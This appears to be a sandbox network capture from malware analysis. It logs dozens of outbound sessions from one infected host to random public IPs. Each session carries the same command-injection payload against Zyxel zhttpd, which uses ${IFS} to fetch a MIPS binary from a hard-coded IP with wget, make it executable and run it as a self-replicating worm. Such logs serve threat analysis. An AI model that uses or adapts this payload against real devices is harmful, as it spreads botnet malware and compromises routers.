                                              Jan 29, 2024 07:03:57.154938936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6215192.168.2.1440566156.202.55.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.154968023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6216192.168.2.1454634165.224.42.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155013084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6217192.168.2.1454200165.186.138.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155067921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6218192.168.2.1458906207.128.74.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155097008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6219192.168.2.143712446.66.81.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155102015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6220192.168.2.1447948184.239.239.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155149937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6221192.168.2.1454142147.250.69.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155215979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6222192.168.2.144298237.63.172.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155244112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6223192.168.2.1454528196.65.122.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155282021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6224192.168.2.143376086.147.60.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155317068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6225192.168.2.143697093.221.144.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155361891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6226192.168.2.1452456153.81.123.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155395985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6227192.168.2.1454674101.123.45.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155435085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6228192.168.2.145828494.219.2.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155476093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6229192.168.2.1440030110.173.187.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155513048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6230192.168.2.1449820134.58.16.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155539989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6231192.168.2.143308841.17.33.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155580997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6232192.168.2.1454510116.61.106.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155626059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6233192.168.2.1447650188.202.43.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155658007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6234192.168.2.1432808176.149.120.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155709028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6235192.168.2.1433090188.87.157.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155739069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6236192.168.2.144420269.87.160.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155776978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6237192.168.2.1439112206.146.47.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155832052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6238192.168.2.144589034.221.164.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155853987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6239192.168.2.1445288156.250.89.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155904055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6240192.168.2.1460630162.58.246.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155932903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6241192.168.2.144349640.237.99.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.155983925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6242192.168.2.1441558211.87.116.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156029940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6243192.168.2.143717465.126.40.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156061888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6244192.168.2.1439860187.252.96.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156080008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6245192.168.2.1438540222.102.16.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156112909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6246192.168.2.145069670.143.212.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156167030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6247192.168.2.1443682204.9.39.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156197071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6248192.168.2.1436390109.139.124.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156228065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6249192.168.2.144414464.99.76.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156270027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6250192.168.2.1441416182.150.124.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156306982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6251192.168.2.143300448.21.112.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156343937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6252192.168.2.1440812171.34.35.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156397104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6253192.168.2.144369662.248.112.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156434059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6254192.168.2.1442218204.122.31.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156476974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6255192.168.2.145306866.204.116.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156503916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6256192.168.2.145445696.31.181.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156538963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6257192.168.2.145237299.103.182.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156585932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6258192.168.2.14469204.214.171.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156639099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6259192.168.2.1460912213.104.139.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156676054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6260192.168.2.1447388138.124.97.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156722069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6261192.168.2.144266671.123.245.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156769037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6262192.168.2.143668434.52.80.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156804085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6263192.168.2.144275412.113.99.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156832933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6264192.168.2.1441610170.244.59.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156873941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6265192.168.2.1454130165.103.0.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156899929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6266192.168.2.1433632125.191.54.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156933069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6267192.168.2.1447610157.152.172.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.156985044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6268192.168.2.1439198144.129.172.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157028913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6269192.168.2.1446688142.31.236.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157066107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6270192.168.2.145149865.191.13.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157115936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6271192.168.2.1454714124.241.51.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157166958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6272192.168.2.145250863.4.0.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157203913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6273192.168.2.143906445.65.16.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.157243013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6274192.168.2.1454630201.171.166.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.160588026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6275192.168.2.1433594189.14.48.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.160618067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6276192.168.2.1435840134.179.198.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:57.160650969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6277192.168.2.144572613.103.106.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.162549973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6278192.168.2.1434678154.103.141.77443
                                              TimestampBytes transferredDirectionData
